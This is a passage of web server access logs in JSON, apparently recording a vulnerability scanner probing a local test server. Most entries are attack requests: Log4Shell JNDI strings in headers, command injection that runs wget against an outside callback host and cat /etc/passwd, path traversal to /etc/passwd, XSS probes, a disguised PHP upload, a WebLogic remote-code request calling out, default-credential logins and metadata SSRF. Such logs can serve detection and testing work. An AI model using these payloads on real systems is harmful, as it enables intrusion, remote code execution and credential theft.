AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /action/usermanager.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/servlets/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///system///sling///loginstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /installer-log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webEdition/showTempFile.php?file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"http:","request":"GET /cs/Satellite?destpage=\x22&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/jsp/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/metadata/v1.json HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.415","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /centreon/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/pdf-invoices/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://ca28bc0smpvbbtig07h0sjzogaknm73cc.oast.pro`","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi? HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.021","http_user_agent":"${jndi:ldap://127.0.0.1#.${hostName}.useragent.ca28bc0smpvbbtig07h0boyyikrrobm43.oast.pro}", "http_referer":"${jndi:ldap://127.0.0.1#.${hostName}.referer.ca28bc0smpvbbtig07h03xo4hobg8azbt.oast.pro}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.ca28bc0smpvbbtig07h0uuezecyrgfzrx.oast.pro}"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/serverInfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/websocket/index.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%2729KBxXPez2oJ6kjUptZ09v3DU1I%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"return=index.php&username=administrator&password=root","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslmgr HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"ca28bc0smpvbbtig07h057eimaw6oagci.oast.pro","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owncloud/config/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0AwmuUploadFiles\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_nonce\x22\x0D\x0A\x0D\x0A{{wmuSecurity}}\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmuAttachmentsData\x22\x0D\x0A\x0D\x0Aundefined\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_files[0]\x22; filename=\x22rce.php\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\xFF\xD8\xFF\xE1jExifMM*\xFD\xFD\xFDi\xFD\xFD>\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xA8\xFD\xFD\xFD\xFD\xC0\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFF\xE0\xFDJFIF\xFD\xFD\xFD\xFD\xFF\xDBC\xFD\xFD\x0C\xFD\x0C\x0A\xFD\xFD\x0D\x0A\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22postId\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://ca28bc0smpvbbtig07h0h9cqdmemynzfy.oast.pro') HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/Auth/ip_snmp.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"{\x0D\x0A \x22user_login\x22:\x2229KBxgglzcOurB3eFHZ9Sqju5hS\x22,\x0D\x0A \x22password\x22:\x2229KBxgglzcOurB3eFHZ9Sqju5hS\x22,\x0D\x0A \x22user_name\x22:\x2229KBxgglzcOurB3eFHZ9Sqju5hS\x22,\x0D\x0A \x22user_email\x22:\x2229KBxgglzcOurB3eFHZ9Sqju5hS@example.com\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-json/buddypress/v1/signup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/admin/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"@ca28bc0smpvbbtig07h0xr1mbshn3knft.oast.pro","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.028","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_imagebrowser&folder=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/diagnostic.html?t=201701020919", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlpserver/ReportTemplateService.xls HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"user=admin&passwd=admin&challengePwd=&ok=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", 